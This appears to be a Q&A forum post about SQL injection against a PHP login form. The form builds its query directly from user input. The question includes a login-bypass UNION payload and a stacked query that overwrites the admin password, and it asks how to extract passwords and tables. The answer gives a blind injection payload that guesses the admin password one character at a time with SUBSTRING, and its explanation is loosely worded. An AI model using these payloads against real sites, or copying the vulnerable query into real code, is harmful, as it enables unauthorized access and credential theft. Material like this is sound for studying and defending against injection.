This is the back-end PHP code which where I will test the vulnerability.
if(isset($_POST["login"]) && isset($_POST["password"])){
$login = $_POST["login"];
$password = $_POST["password"];
$sql="SELECT * FROM users WHERE login='$login' AND password='$password'";
$result= mysqli_query($conn, $sql);
if(mysqli_num_rows($result) != 0){
echo "<h1>Login Success!</h1>";
$row = mysqli_fetch_array($result);
extract($row);
echo "Welcome , ".$login;
}
This is the code I will inject the login field.
' UNION SELECT * FROM users --
It seems I am able to login but what should I do to have the passwords displayed in a error message or anything on the web page once the injection is made?
Like what query you guys recommend to be appended to the code to extract passwords , database information , all tables etc.
Do take note I have limited SQL Knowledge so I might not know any queries to do the trick.
Assuming the back-end or server-side PHP code also accepts multi query execution. I would like to know solutions on how do I achieve extracting passwords via multi query injection too?
Something like the below code which I can update user’s details assuming I know there is an admin user in there when I input it into the login field
' OR 1 = 1; UPDATE users SET password='stackOverFlow' WHERE login='admin' --
Recommend me both solutions about displaying passwords or useful information on the web page with just code injection in the login fields instead of URL Injection where if the server can execute multi SQL query or if the server cannot execute multi query.
Advertisement
Answer
You can send input many time hy change ‘a’ to ‘z’
' union select * from user where login='admin' and SUBSTRING(password, 1, 1)='a' --
when login success, the first character in password is ‘a’ or ‘z’.
Loop throght step 1 change SUBSTRING(password, 1, 1) to SUBSTRING(password, 2, 1) to detect second character in password